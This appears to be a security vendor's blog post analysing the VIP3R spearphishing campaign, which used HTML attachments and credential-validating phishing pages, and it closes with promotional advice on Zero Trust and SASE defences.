Phishing is a security threat faced by almost every organization worldwide.
From email addresses, user IDs and passwords to bank details and PIN codes, those perpetrators successful in stealing highly sensitive data and credentials may go on to steal large sums, execute identity fraud, access company secrets, deploy ransomware and conduct other highly damaging actions.
Geographies, industries, size and stature – when it comes to social engineering attacks, cyber-criminals don’t discriminate. Threat actors recognize that every company has one thing in common: people.
Human error plays a part in almost all cyber-attacks, with phishing being one of the primary proponents of this statistic. According to a 2021 study from Cisco, at least one individual clicks on phishing links in 86% of organizations. Additionally, the firm reported that 90% of data breaches can be linked to phishing.
We as humans all have inherent cognitive biases – biases that can be manipulated by attackers, leading us to perform actions that can result in catastrophic consequences without us ever really knowing.
The likelihood that we might fall victim to such manipulation increases dramatically in the case of spearphishing. While many typical phishing campaigns opt for a ‘spray-and-pray’ approach to reach as many potential victims as possible, spearphishing is a much more targeted methodology that sees highly tailored campaigns deployed against specific organizations or individuals.
That brings us to VIP3R – a spearphishing campaign recently identified by the team at Menlo Labs.
VIP3R’s Unique Characteristics
Having encountered a web server of compromised usernames and passwords, our analysts were able to confirm that a campaign with the unique string of “DH4 VIP3R L337” had leveraged 147 unique lures to steal the credentials of 164 users spanning various companies, from financial services organizations to cybersecurity firms.
Digging deeper, we learned that the attack used customized HTML attachment payloads to its target victims, which – if opened – would direct them to a phishing page impersonating a service they would commonly use.
The use of an HTML attachment is key; these file types are exempt from the default blocks found within most secure email gateways (SEG) owing to their common usage among large financial firms in sending encrypted emails.
Having analyzed the VIP3R campaign, the evidence suggests that these HTML attachments are being created automatically by a sophisticated payload generator kit. The Menlo Labs team has been unable to verify this as yet, despite having spent significant time looking for it. So, for now, we continue to track this as “VIP3R_L33T Generator.”
Upon reaching the impersonated phishing pages, victims would be prompted to submit their credentials, which would then be validated and verified on the server side using the PHPMailer library. Resultantly, the victim’s username and password would be sent directly to an email address controlled by the attacker.
If this verification process failed, an error message would be sent back to the user via the browser, who would then be redirected to the legitimate equivalent of the phishing website. On the flip side, if the verification of the victim’s email and password was successful, the client would be directed to a pdf hosted on Microsoft OneDrive.
Resultantly, not only does the VIP3R campaign bypass default SEG blocks, but it also provides attackers with an easy and unique way of validating victim credentials.
Protecting Against Increasingly Sophisticated Threats
Analyzing our own customer base, we see phishing continuing to be one of the primary attack methods plaguing firms today.
Indeed, 22% of all threats faced by our customers are credential phishing attacks. Further, 7% of these are not detected by legacy URL reputation engines, deploying evasive tactics we’ve dubbed LURE.
LURE leverages one of the four evasive techniques found in Highly Evasive Adaptive Threats (HEAT), the use of which has been increasing significantly in recent times across varying campaigns, up 224% in H2 2021. In reviewing well over 500,000 malicious URLs, for example, we found that 69% of them used HEAT tactics.
To effectively combat the threat of phishing, first, we must focus on enhancing awareness among their employee bases through regular and thorough training and education initiatives. To prevent the threat of HEAT attacks at large, however, firms will need to transform their security, pivoting to Zero Trust principles while adopting the Secure Access Service Edge (SASE) framework.